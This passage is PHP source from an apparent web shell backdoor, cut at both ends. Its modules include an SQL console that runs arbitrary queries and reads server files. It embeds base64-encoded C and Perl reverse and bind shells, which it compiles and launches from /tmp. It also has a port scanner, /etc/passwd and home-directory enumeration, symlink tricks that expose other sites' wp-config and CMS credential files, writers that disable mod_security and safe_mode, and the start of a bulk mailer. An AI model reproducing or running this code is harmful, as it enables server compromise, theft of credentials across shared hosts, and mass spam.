<td><input type=text name=sql_login value= »‘ . (empty($_POST[‘sql_login’]) ? ‘root’ : htmlspecialchars($_POST[‘sql_login’])) . ‘ »></td>
<td><input type=text name=sql_pass value= »‘ . (empty($_POST[‘sql_pass’]) ? » : htmlspecialchars($_POST[‘sql_pass’])) . ‘ »></td>
<td>’;
$tmp = « <input type=text name=sql_base value= »> »;
if (isset($_POST[‘sql_host’])) {
if ($db->connect($_POST[‘sql_host’], $_POST[‘sql_login’], $_POST[‘sql_pass’], $_POST[‘sql_base’])) {
switch ($_POST[‘charset’]) {
case « Windows-1251 »:
$db->setCharset(‘cp1251’);
break;
case « UTF-8 »:
$db->setCharset(‘utf8’);
break;
case « KOI8-R »:
$db->setCharset(‘koi8r’);
break;
case « KOI8-U »:
$db->setCharset(‘koi8u’);
break;
case « cp866 »:
$db->setCharset(‘cp866’);
break;
}
$db->listDbs();
echo « <select name=sql_base><option value= »></option> »;
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo ‘<option value= »‘ . $value . ‘ » ‘ . ($value == $_POST[‘sql_base’] ? ‘selected’ : ») . ‘>’ . $value . ‘</option>’;
}
echo ‘</select>’;
} else echo $tmp;
} else echo $tmp;
echo ‘</td>
<td><input type=submit value= »>> »></td>
</tr>
</table>
<script>
function st(t,l) {
document.sf.p1.value = \’select\’;
document.sf.p2.value = t;
if(l!=null)document.sf.p3.value = l;
document.sf.submit();
}
function is() {
for(i=0;i<document.sf.elements[\’tbl[]\’].length;++i)
document.sf.elements[\’tbl[]\’][i].checked = !document.sf.elements[\’tbl[]\’][i].checked;
}
</script>’;
if (isset($db) && $db->link) {
echo « <br/><table width=100% cellpadding=2 cellspacing=0> »;
if (!empty($_POST[‘sql_base’])) {
$db->selectdb($_POST[‘sql_base’]);
echo « <tr><td width=1 style=’border-top:2px solid #666;border-right:2px solid #666;’><span>Tables:</span><br><br> »;
$tbls_res = $db->listTables();
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
$n = $db->fetch($db->query(‘SELECT COUNT(*) as n FROM ‘ . $value . »));
$value = htmlspecialchars($value);
echo « <nobr><input type=’checkbox’ name=’tbl[]’ value=' » . $value . « ‘> <a href=# onclick=\ »st(‘ » . $value . « ‘)\ »> » . $value . « </a> ( » . $n[‘n’] . « )</nobr><br> »;
}
echo « <input type=’checkbox’ onclick=’is();’> <input type=button value=’Dump’ onclick=’document.sf.p2.value=\ »download\ »;document.sf.submit();’></td><td style=’border-top:2px solid #666;’> »;
if (@$_POST[‘p1’] == ‘select’) {
$_POST[‘p1’] = ‘query’;
$db->query(‘SELECT COUNT(*) as n FROM ‘ . $_POST[‘p2’] . »);
$num = $db->fetch();
$num = $num[‘n’];
echo « <span> » . $_POST[‘p2’] . « </span> ($num) « ;
for ($i = 0;$i < ($num / 30);$i++) if ($i != (int)$_POST[‘p3′]) echo « <a href=’#’ onclick=’st(\ » » . $_POST[‘p2′] . « \ », $i)’> », ($i + 1), « </a> « ;
else echo ($i + 1), » « ;
if ($_POST[‘type’] == ‘pgsql’) $_POST[‘p3’] = ‘SELECT * FROM ‘ . $_POST[‘p2’] . ‘ LIMIT 30 OFFSET ‘ . ($_POST[‘p3’] * 30);
else $_POST[‘p3’] = ‘SELECT * FROM `’ . $_POST[‘p2’] . ‘` LIMIT ‘ . ($_POST[‘p3’] * 30) . ‘,30’;
echo « <br><br> »;
}
if ((@$_POST[‘p1’] == ‘query’) && !empty($_POST[‘p3’])) {
$db->query(@$_POST[‘p3’]);
if ($db->res !== false) {
$title = false;
echo ‘<table width=100% cellspacing=0 cellpadding=2 class=main>’;
$line = 1;
while ($item = $db->fetch()) {
if (!$title) {
echo ‘<tr>’;
foreach ($item as $key => $value) echo ‘<th>’ . $key . ‘</th>’;
reset($item);
$title = true;
echo ‘</tr><tr>’;
$line = 2;
}
echo ‘<tr class= »l’ . $line . ‘ »>’;
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) echo ‘<td><i>null</i></td>’;
else echo ‘<td>’ . nl2br(htmlspecialchars($value)) . ‘</td>’;
}
echo ‘</tr>’;
}
echo ‘</table>’;
} else {
echo ‘<div><b>Error:</b> ‘ . htmlspecialchars($db->error()) . ‘</div>’;
}
}
echo « <br><textarea name=’p3′ style=’width:100%;height:100px’> » . @htmlspecialchars($_POST[‘p3′]) . « </textarea><br/><input type=submit value=’Execute’> »;
echo « </td></tr> »;
}
echo « </table></form><br/><form onsubmit=’document.sf.p1.value=\ »loadfile\ »;document.sf.p2.value=this.f.value;document.sf.submit();return false;’><span>Load file</span> <input class=’toolsInp’ type=text name=f><input type=submit value=’>>’></form> »;
if (@$_POST[‘p1’] == ‘loadfile’) {
$db->query(« SELECT LOAD_FILE(‘ » . addslashes($_POST[‘p2’]) . « ‘) as file »);
$file = $db->fetch();
echo ‘<pre class=ml1>’ . htmlspecialchars($file[‘file’]) . ‘</pre>’;
}
}
echo ‘</div>’;
printFooter();
}
function actionNetwork() {
printHeader();
$back_connect_c = « I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9 »;
$back_connect_p = « IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7 »;
$bind_port_c = « I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9 »;
$bind_port_p = « IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0= »;
echo ‘<h1>Network tools</h1><div class=content>
<form name=\’nfp\’ onSubmit= »g(null,null,this.using.value,this.port.value,this.pass.value);return false; »>
<br /><span>Bind port to /bin/sh</span><br/>
Port: <input type=\’text\’ name=\’port\’ value=\’443\’> Password: <input type=\’text\’ name=\’pass\’ value=\’Dr.web\’> Using: <select name= »using »><option value=\’bpc\’>C</option><option value=\’bpp\’>Perl</option></select> <input type=submit value= »>> »>
</form>
<form name=\’nfp\’ onSubmit= »g(null,null,this.using.value,this.server.value,this.port.value);return false; »>
<br /><br /><span>Back-connect to</span><br/>
Server: <input type=\’text\’ name=\’server\’ value= »‘ . $_SERVER[‘REMOTE_ADDR’] . ‘ »> Port: <input type=\’text\’ name=\’port\’ value=\’443\’> Using: <select name= »using »><option value=\’bcc\’>C</option><option value=\’bcp\’>Perl</option></select> <input type=submit value= »>> »>
</form><br>’;
if (isset($_POST[‘p1’])) {
function cf($f, $t) {
$w = @fopen($f, « w ») or @function_exists(‘file_put_contents’);
if ($w) {
@fwrite($w, base64_decode($t)) or @fputs($w, base64_decode($t)) or @file_put_contents($f, base64_decode($t));
@fclose($w);
}
}
if ($_POST[‘p1’] == ‘bpc’) {
cf(« /tmp/bp.c », $bind_port_c);
$out = ex(« gcc -o /tmp/bp /tmp/bp.c »);
@unlink(« /tmp/bp.c »);
$out.= ex(« /tmp/bp » . $_POST[‘p2’] . » » . $_POST[‘p3’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bp ») . « </pre> »;
}
if ($_POST[‘p1’] == ‘bpp’) {
cf(« /tmp/bp.pl », $bind_port_p);
$out = ex(which(« perl ») . » /tmp/bp.pl » . $_POST[‘p2’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bp.pl ») . « </pre> »;
}
if ($_POST[‘p1’] == ‘bcc’) {
cf(« /tmp/bc.c », $back_connect_c);
$out = ex(« gcc -o /tmp/bc /tmp/bc.c »);
@unlink(« /tmp/bc.c »);
$out.= ex(« /tmp/bc » . $_POST[‘p2’] . » » . $_POST[‘p3’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bc ») . « </pre> »;
}
if ($_POST[‘p1’] == ‘bcp’) {
cf(« /tmp/bc.pl », $back_connect_p);
$out = ex(which(« perl ») . » /tmp/bc.pl » . $_POST[‘p2’] . » » . $_POST[‘p3’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bc.pl ») . « </pre> »;
}
}
echo ‘</div>’;
printFooter();
}
function actionPortScanner() {
printHeader();
echo ‘<h1>Port Scanner</h1>’;
echo ‘<div class= »content »>’;
echo ‘<form action= » » method= »post »>’;
if (isset($_POST[‘host’]) && is_numeric($_POST[‘end’]) && is_numeric($_POST[‘start’])) {
$start = strip_tags($_POST[‘start’]);
$end = strip_tags($_POST[‘end’]);
$host = strip_tags($_POST[‘host’]);
for ($i = $start;$i <= $end;$i++) {
$fp = @fsockopen($host, $i, $errno, $errstr, 3);
if ($fp) {
echo ‘Port ‘ . $i . ‘ is <font color=green>open</font><br>’;
}
flush();
}
} else {
echo ‘<br /><br /><center><input type= »hidden » name= »a » value= »PortScanner »><input type= »hidden » name=p1><input type= »hidden » name= »p2″>
<input type= »hidden » name= »c » value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type= »hidden » name= »charset » value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
Host: <input type= »text » name= »host » value= »localhost »/><br /><br />
Port start: <input type= »text » name= »start » value= »0″/><br /><br />
Port end:<input type= »text » name= »end » value= »5000″/><br /><br />
<input type= »submit » value= »Scan Ports » />
</form></center><br /><br />’;
}
echo ‘</div>’;
printFooter();
}
function actionReadable() {
printHeader();
echo ‘<h1>Readable Dirs</h1>’;
echo ‘<div class= »content »>’;
$sm = ini_get(‘safe_mode’);
if ($sm) {
echo ‘<br /><b>Error: safe_mode = on</b><br /><br />’;
} else {
@$passwd = fopen(‘/etc/passwd’, ‘r’);
if (!$passwd) {
echo ‘<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />’;
} else {
$pub = array();
$users = array();
$conf = array();
$i = 0;
while (!feof($passwd)) {
$str = fgets($passwd);
if ($i > 35) {
$pos = strpos($str, ‘:’);
$username = substr($str, 0, $pos);
$dirz = ‘/home/’ . $username . ‘/public_html/’;
if (($username != »)) {
if (is_readable($dirz)) {
array_push($users, $username);
array_push($pub, $dirz);
}
}
}
$i++;
}
echo ‘<br><br>’;
echo « [+] Founded » . sizeof($users) . » entrys in /etc/passwd
» . « <br /> »;
echo « [+] Founded » . sizeof($pub) . » readable public_html directories
» . « <br /><br /><br /> »;
foreach ($users as $user) {
$path = « /home/$user/public_html/ »;
echo $path . « <br> »;
}
echo « <br /><br /><br />[+] Complete…
» . « <br /> »;
}
}
echo ‘</div>’;
printFooter();
}
function actionSymlink() {
printHeader();
echo ‘<h1>Symlink</h1>’;
$furl = ‘http://’ . $_SERVER[‘SERVER_NAME’] . $_SERVER[‘REQUEST_URI’];
$expld = explode(‘/’, $furl);
$burl = str_replace(end($expld), », $furl);
echo ‘<div class= »content »><center>
<h3>[ <a href= »# » onclick= »g(\’symlink\’,null,\’website\’,null) »>Domains</a> ] –
[ <a href= »# » onclick= »g(\’symlink\’,null,\’whole\’,null) »>Whole Server Symlink</a> ] –
[ <a href= »# » onclick= »g(\’symlink\’,null,\’config\’,null) »>Config files symlink</a> ]</h3></center>’;
if (isset($_POST[‘p1’]) && $_POST[‘p1’] == ‘website’) {
echo « <center> »;
$d0mains = @file(« /etc/named.conf »);
if (!$d0mains) {
echo « <pre class=ml1 style=’margin-top:5px’>Cant access this file on server -> [ /etc/named.conf ]</pre></center> »;
} else {
echo « <table align=center class=’main’ border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr> »;
$unk = array();
foreach ($d0mains as $d0main) {
if (@eregi(« zone », $d0main)) {
preg_match_all(‘#zone « (.*) »#’, $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
$unk[] = $domains[1][0];
flush();
}
}
}
$count = 1;
$unk = array_unique($unk);
$l = 0;
foreach ($unk as $d) {
$user = posix_getpwuid(@fileowner(« /etc/valiases/ » . $d));
echo « <tr » . ($l ? ‘ class=l1’ : ») . « ><td> » . $count . « </td><td><a href=http:// » . $d . « /> » . $d . « </a></td><td> » . $user[‘name’] . « </td></tr> »;
flush();
$count++;
$l = $l ? 0 : 1;
}
echo « </table> »;
}
echo « </center> »;
}
if (isset($_POST[‘p1’]) && $_POST[‘p1’] == ‘whole’) {
echo « <center> »;
@mkdir(‘sym’, 0777);
$hdt = « Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any »;
$hfp = @fopen(‘sym/.htaccess’, ‘w’);
fwrite($hfp, $hdt);
if (function_exists(‘symlink’)) {
@symlink(‘/’, ‘sym/root’);
}
$d0mains = @file(‘/etc/named.conf’);
if (!$d0mains) {
echo « <pre class=ml1 style=’margin-top:5px’># Cant access this file on server -> [ /etc/named.conf ]</pre></center> »;
} else {
echo « <table align=’center’ width=’40%’ class=’main’><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr> »;
$count = 1;
$mck = array();
foreach ($d0mains as $d0main) {
if (@eregi(‘zone’, $d0main)) {
preg_match_all(‘#zone « (.*) »#’, $d0main, $domain);
flush();
if (strlen(trim($domain[1][0])) > 2) {
$mck[] = $domain[1][0];
}
}
}
$mck = array_unique($mck);
$l = 0;
foreach ($mck as $d) {
$user = posix_getpwuid(@fileowner(‘/etc/valiases/’ . $d));
$ddt = $user[‘name’];
//@symlink(‘/’,’sym/root’);
$ddt = $d;
if (@eregi(« \.ir », $d) or @eregi(« \.il », $d)) {
$ddt = « <div style=’ color: #FF0000 ; text-shadow: 0px 0px 1px red; ‘> » . $d . ‘</div>’;
}
echo « <tr » . ($l ? ‘ class=l1′ : ») . « ><td> » . $count++ . « </td><td><a target=’_blank’ href=http:// » . $d . ‘/>’ . $ddt . ‘ </a></td><td>’ . $user[‘name’] . « </td><td><a href=’sym/root/home/ » . $user[‘name’] . « /public_html’ target=’_blank’>symlink </a></td></tr> »;
flush();
$l = $l ? 0 : 1;
}
echo ‘</table>’;
}
echo « </center> »;
}
if (isset($_POST[‘p1’]) && $_POST[‘p1’] == ‘config’) {
echo « <center> »;
@mkdir(‘sym’, 0777);
$hdt = « Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any »;
$hfp = @fopen(‘sym/.htaccess’, ‘w’);
@fwrite($hfp, $hdt);
if (function_exists(‘symlink’)) {
@symlink(‘/’, ‘sym/root’);
}
$d0mains = @file(‘/etc/named.conf’);
if (!$d0mains) {
echo « <pre class=ml1 style=’margin-top:5px’># Cant access this file on server -> [ /etc/named.conf ]</pre></center> »;
} else {
echo « <table align=’center’ width=’40%’ class=’main’ ><tr><th> Count </th><th> Domains </th><th> Script </th></tr> »;
$count = 1;
$l = 0;
foreach ($d0mains as $d0main) {
if (@eregi(‘zone’, $d0main)) {
preg_match_all(‘#zone « (.*) »#’, $d0main, $domain);
flush();
if (strlen(trim($domain[1][0])) > 2) {
$user = posix_getpwuid(@fileowner(‘/etc/valiases/’ . $domain[1][0]));
$c1 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/wp-config.php’;
$ch01 = get_headers($c1);
$cf01 = $ch01[0];
$c2 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/blog/wp-config.php’;
$ch02 = get_headers($c2);
$cf02 = $ch02[0];
$c3 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/configuration.php’;
$ch03 = get_headers($c3);
$cf03 = $ch03[0];
$c4 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/joomla/configuration.php’;
$ch04 = get_headers($c4);
$cf04 = $ch04[0];
$c5 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/includes/config.php’;
$ch05 = get_headers($c5);
$cf05 = $ch05[0];
$c6 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/vb/includes/config.php’;
$ch06 = get_headers($c6);
$cf06 = $ch06[0];
$c7 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/forum/includes/config.php’;
$ch07 = get_headers($c7);
$cf07 = $ch07[0];
$c8 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘public_html/clients/configuration.php’;
$ch08 = get_headers($c8);
$cf08 = $ch08[0];
$c9 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/support/configuration.php’;
$ch09 = get_headers($c9);
$cf09 = $ch09[0];
$c10 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/client/configuration.php’;
$ch10 = get_headers($c10);
$cf10 = $ch10[0];
$c11 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/submitticket.php’;
$ch11 = get_headers($c11);
$cf11 = $ch11[0];
$c12 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/client/configuration.php’;
$ch12 = get_headers($c12);
$cf12 = $ch12[0];
$c13 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/includes/configure.php’;
$ch13 = get_headers($c13);
$cf13 = $ch13[0];
$c14 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/include/app_config.php’;
$ch14 = get_headers($c14);
$cf14 = $ch14[0];
$c15 = $burl . ‘/sym/root/home/’ . $user[‘name’] . ‘/public_html/sites/default/settings.php’;
$ch15 = get_headers($c15);
$cf15 = $ch15[0];
$out = ‘ ’;
if (strpos($cf01, ‘200’) == true) {
$out = « <a href=' » . $c1 . « ‘ target=’_blank’>Wordpress</a> »;
} elseif (strpos($cf02, ‘200’) == true) {
$out = « <a href=' » . $c2 . « ‘ target=’_blank’>Wordpress</a> »;
} elseif (strpos($cf03, ‘200’) == true && strpos($cf11, ‘200’) == true) {
$out = » <a href=' » . $c11 . « ‘ target=’_blank’>WHMCS</a> »;
} elseif (strpos($cf09, ‘200’) == true) {
$out = » <a href=' » . $c9 . « ‘ target=’_blank’>WHMCS</a> »;
} elseif (strpos($cf10, ‘200’) == true) {
$out = » <a href=' » . $c10 . « ‘ target=’_blank’>WHMCS</a> »;
} elseif (strpos($cf03, ‘200’) == true) {
$out = » <a href=' » . $c3 . « ‘ target=’_blank’>Joomla</a> »;
} elseif (strpos($cf04, ‘200’) == true) {
$out = » <a href=' » . $c4 . « ‘ target=’_blank’>Joomla</a> »;
} elseif (strpos($cf05, ‘200’) == true) {
$out = » <a href=' » . $c5 . « ‘ target=’_blank’>vBulletin</a> »;
} elseif (strpos($cf06, ‘200’) == true) {
$out = » <a href=' » . $c6 . « ‘ target=’_blank’>vBulletin</a> »;
} elseif (strpos($cf07, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>vBulletin</a> »;
} elseif (strpos($cf08, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Client Area</a> »;
} elseif (strpos($cf12, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Client Area</a> »;
} elseif (strpos($cf13, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>osCommerce/Zen Cart</a> »;
} elseif (strpos($cf14, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Magento</a> »;
} elseif (strpos($cf15, ‘200’) == true) {
$out = » <a href=' » . $c7 . « ‘ target=’_blank’>Drupal</a> »;
} else {
continue;
}
echo ‘<tr’ . ($l ? ‘ class=l1’ : ») . ‘><td>’ . $count++ . ‘</td><td><a href=http://www.’ . $domain[1][0] . ‘/>’ . $domain[1][0] . ‘</a></td><td>’ . $user[‘name’] . ‘</td><td>’ . $out . ‘</td></tr>’;
flush();
$l = $l ? 0 : 1;
}
}
}
echo « </table> »;
}
echo « </center> »;
}
echo « </div> »;
printFooter();
}
function actionBypass() {
printHeader();
echo ‘<h1>Safe Mode</h1>’;
echo ‘<div class= »content »>’;
echo « <div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| » . $GLOBALS[‘cwd’] . » |<br><br /> »;
echo ‘<a href=# onclick= »g(null,null,\’php.ini\’,null) »>| PHP.INI | </a><a href=# onclick= »g(null,null,null,\’ini\’) »>| .htaccess(Mod) | </a><a href=# onclick= »g(null,null,null,null,\’sh\’) »>| .htaccess(perl) | </a></center>’;
if (!empty($_POST[‘p2’]) && isset($_POST[‘p2’])) {
$fil = fopen($GLOBALS[‘cwd’] . « .htaccess », « w »);
fwrite($fil, ‘<IfModule mod_security.c>
Sec——Engine Off
Sec——ScanPOST Off
</IfModule>’);
fclose($fil);
}
if (!empty($_POST[‘p1’]) && isset($_POST[‘p1’])) {
$fil = fopen($GLOBALS[‘cwd’] . « php.ini », « w »);
fwrite($fil, ‘safe_mode=OFF
disable_functions=NONE’);
fclose($fil);
}
if (!empty($_POST[‘p3’]) && isset($_POST[‘p3’])) {
$fil = fopen($GLOBALS[‘cwd’] . « .htaccess », « w »);
fwrite($fil, ‘Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl’);
fclose($fil);
}
echo « <br><br /><br /></div> »;
echo ‘</div>’;
printFooter();
}
function actionGetUser() {
printHeader();
echo ‘<h1>Get User</h1>’;
$i = 0;
while ($i < 60000) {
$line = posix_getpwuid($i);
if (!empty($line)) {
while (list($key, $vl) = each($line)) {
echo « $vl</br> »;
break;
}
}
$i++;
}
printFooter();
}
function actionMailer() {
printHeader();
echo ‘<h1>Mailer</h1>’;
//Dont change anything from below
$secure = « »;
error_reporting(0);
@$action = $_POST[‘action’];
@$from = $_POST[‘from’];
@$realname = $_POST[‘realname’];
@$replyto = $_POST[‘replyto’];
@$subject = $_POST[‘subject’];
@$message = $_POST[‘message’];
@$emaillist = $_POST[’emaillist’];
@$file_name = $_FILES[‘file’][‘name’];
@$contenttype = $_POST[‘contenttype’];
@$file = $_FILES[‘file’][‘tmp_name’];
@$amount = $_POST[‘amount’];
set_time_limit(intval($_POST[‘timelimit’]));
?>
<!DOCTYPE html PUBLIC « -//W3C//DTD XHTML 1.0 Transitional//EN »
« http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd »>
<html>
<head>
<title> [MaiLer BY The Gen!us] </title>
<p align= »center »>
<title> [MaiLer BY The Gen!us] </title>
</p>
<meta http-equiv= »Content-Type » content= »text/html; charset=windows-1256″>
<style type= »text/css »>
<!–
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
–>
</style>
</head>
<body bgcolor= »#F5F5F5″ text= »#000000″>
<?php
If ($action == « mysql ») {
//Grab email addresses from MySQL
include « ./mysql.info.php »;
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery) {
print « Please configure mysql.info.php with your MySQL information. All settings in this config file are required. »;
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die(« Connection to MySQL Failed. »);
mysql_select_db($sqldb, $db) or die(« Could not select database $sqldb »);
$result = mysql_query($sqlquery) or die(« Query Failed: $sqlquery »);
$numrows = mysql_num_rows($result);
for ($x = 0;$x < $numrows;$x++) {
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist.= $oneemail . »
« ;
}
}
if ($action == « send ») {
$message = urlencode($message);
$message = ereg_replace(« %5C%22 », « %22″, $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name= »form1″ method= »post » action= » » enctype= »multipart/form-data »><br />
<table width= »142″ border= »0″>
<tr>
<td width= »81″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Your Email:</font>
</div>
</td>
<td width= »219″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »from » value= »<?php print $from; ?> » size= »30″ />
</font>
</td>
<td width= »212″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Your Name:</font>
</div>
</td>
<td width= »278″>
